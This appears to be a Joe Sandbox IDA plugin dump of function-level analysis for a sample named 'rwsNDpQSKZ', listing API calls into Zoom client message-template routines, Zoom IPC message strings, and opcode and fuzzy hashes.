                • Opcode Fuzzy Hash: 7c01381259eddae809e52b54ccea60154b99dc64b28730a71ddac2d8d72fb4e3
                • Instruction Fuzzy Hash: 86E022F2A09A89ABD720BB44485AB5E3964AB40B09F500118B2044F7E0CBF00C00D376
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74067
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.invitee.iak.response,00002773,buddy_id,iak,00000004), ref: 00C74087
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: buddy_id$com.Zoom.app.conf.invitee.iak.response$iak
                • API String ID: 9112088-2938952272
                • Opcode ID: 2beefc9fbe600a736cf620941d5fb547a74707b6ae6606020568d2a4a2519076
                • Instruction ID: b817d4a3f0dac9771902570e950eede1d43de6165744c14b75205a17d2a71dce
                • Opcode Fuzzy Hash: 2beefc9fbe600a736cf620941d5fb547a74707b6ae6606020568d2a4a2519076
                • Instruction Fuzzy Hash: 15E022B1A14345ABD320AB459C8AB1E22A4AF58B2AF00097AF6105F3D2CBF40C00D375
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74207
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.start.request,00009D30,start,modelDirPath,00000004), ref: 00C74227
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.start.request$modelDirPath$start
                • API String ID: 2715420528-1184729312
                • Opcode ID: d8bfe9975bf4fee2e6f4b4d5c667cf973d55e8132bdd9906d07e8a92f83f3597
                • Instruction ID: 004a424059dbe8a2e7c029d7c31dba6efc4c121f5a432e41f9ca677468976f92
                • Opcode Fuzzy Hash: d8bfe9975bf4fee2e6f4b4d5c667cf973d55e8132bdd9906d07e8a92f83f3597
                • Instruction Fuzzy Hash: ACE068B46803C9ABD710BB859C07B2F7164FB90B19F000A5CB5049A3C2CBF00D00D7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C723E7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getcurrentuser.response,00009E80,JsCallID,CurUserJson,00000004), ref: 00C72407
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: CurUserJson$JsCallID$com.zoom.app.cci.ccivideo.getcurrentuser.response
                • API String ID: 9112088-2696971557
                • Opcode ID: b035dd377c78626aeb510bc51ada7cd1120d2d277e6479640b62fa7e7088484e
                • Instruction ID: aacbd27389af5bb4818e8b954ab7720d122435ce0710205128f02eaac1ef3486
                • Opcode Fuzzy Hash: b035dd377c78626aeb510bc51ada7cd1120d2d277e6479640b62fa7e7088484e
                • Instruction Fuzzy Hash: 8AE092B0B003847BD710AB84A846B3E66A4FB80B5AF604A18B3405B3E1CBF44D48C7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C763A7
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.open.teamchat.rsp,000027AA,openResult,sessionId,00000004), ref: 00C763C7
                  • Part of subcall function 00C87690: __EH_prolog3.LIBCMT ref: 00C87697
                  • Part of subcall function 00C87690: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C875D2,?,?,?,?,00000004,00C874D5,?,?,?,?,?), ref: 00C876AA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.app.conf.pmc.open.teamchat.rsp$openResult$sessionId
                • API String ID: 2715420528-2150493469
                • Opcode ID: a5bd0121ce6e2b5906f47dee9129f6119187bfda4d4d1b92593d6d4b8245d517
                • Instruction ID: e9b2ba185bf742889ec483111eb71d1cdf54f1108ebfd66ec68d4c0b84b07f57
                • Opcode Fuzzy Hash: a5bd0121ce6e2b5906f47dee9129f6119187bfda4d4d1b92593d6d4b8245d517
                • Instruction Fuzzy Hash: A8E092F0A44A94ABD710BB48DC5AB2A72B4EB50B1AF40043CB2049E3E1CBF54D08C7B2
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74367
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.data.response,00009D32,type,jsonString,00000004), ref: 00C74387
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.data.response$jsonString$type
                • API String ID: 2715420528-507074639
                • Opcode ID: f17986ff5ff166520ce3aecff3224ad3a684684d9ef867abe8f5a2eef1b230a4
                • Instruction ID: 854a86c763160ec7c4b9d7e47c418b81b056769f8cf7ee802d428318c2749100
                • Opcode Fuzzy Hash: f17986ff5ff166520ce3aecff3224ad3a684684d9ef867abe8f5a2eef1b230a4
                • Instruction Fuzzy Hash: 3EE092B0A40785FBDB10AB458D46B6E62A4DB50B59F548419F1005B3D2CBF50D04EB76
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74307
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.data.request,00009D31,type,param1,00000004), ref: 00C74327
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.voice.command.data.request$param1$type
                • API String ID: 3124793654-4143552153
                • Opcode ID: 12eb8f1181547d620cafc91cad384423010cadf438fc43b4dc54e20ea72cecff
                • Instruction ID: 284ecd1d49f1222fdf0e69a59b73d5ba27ceee8e976f619bdc14ed52d13ae52e
                • Opcode Fuzzy Hash: 12eb8f1181547d620cafc91cad384423010cadf438fc43b4dc54e20ea72cecff
                • Instruction Fuzzy Hash: 63E022B1A00749FBEB107B408C86B2A71A4AB80B09F504929F1104B392CBF00D44C771
                APIs
                • __EH_prolog3.LIBCMT ref: 00C724A7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getuserlist.response,00009E82,JsCallID,UsersJson,00000004), ref: 00C724C7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: JsCallID$UsersJson$com.zoom.app.cci.ccivideo.getuserlist.response
                • API String ID: 9112088-3602429407
                • Opcode ID: 9827253881441dc8e9080045e3aff798af71f5529e84af204d239d930d94f4b0
                • Instruction ID: ac56db50772bb033d9418886f1c0d2b58e4d6b6b08f1702943082cfcc5f5aa52
                • Opcode Fuzzy Hash: 9827253881441dc8e9080045e3aff798af71f5529e84af204d239d930d94f4b0
                • Instruction Fuzzy Hash: 10E092B4B00384BBE7206B849C46B2E3664AB84F59F90451CF3185B3D1CBF54D44D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68457
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.stop,00002719,ProcessID,ProcessName,00000004), ref: 00C68477
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.Zoom.app.conf.stop
                • API String ID: 2715420528-2522990614
                • Opcode ID: 347a96af648f36256849783a646f675d6a5f467139670a1a850d17da8caa3336
                • Instruction ID: 1397869d326db741d2664d2b4b86fd25cf416e3917ef7d453e0bfb5d72cdcb69
                • Opcode Fuzzy Hash: 347a96af648f36256849783a646f675d6a5f467139670a1a850d17da8caa3336
                • Instruction Fuzzy Hash: 43E092B4A44755ABE7206B455C95B7E6364EB90B1AF940528F2406A3C2CBF40C84D7B8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76467
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.meeting.ended,000027AD,myAccountId,groupId,00000004), ref: 00C76487
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
